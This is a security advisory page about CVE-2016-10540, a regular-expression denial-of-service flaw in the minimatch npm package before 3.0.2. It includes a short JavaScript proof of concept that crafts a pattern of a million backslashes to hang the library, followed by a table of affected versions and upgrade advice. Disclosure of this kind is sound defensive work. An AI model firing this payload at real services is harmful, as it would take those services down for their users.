First published: Thu May 31 2018(Updated: )
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`. ## Proof of Concept ```js var minimatch = require(“minimatch”); // utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; } var exploit = “[!” + genstr(1000000, “\\”) + “A”; // minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ``` ## Recommendation Update to version 3.0.2 or later.
Credit: support@hackerone.com
Affected Software | Affected Version | How to fix |
---|---|---|
npm/minimatch | <3.0.2 | 3.0.2 |
minimatch | <=3.0.1 | |
IBM Security Verify Governance - Identity Manager | <=10.0 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
The vulnerability ID is CVE-2016-10540.
CVE-2016-10540 has a severity rating of 7.5 (high).
The affected software for CVE-2016-10540 is minimatch.
Minimatch is vulnerable to denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.
To fix CVE-2016-10540, update minimatch to version 3.0.2.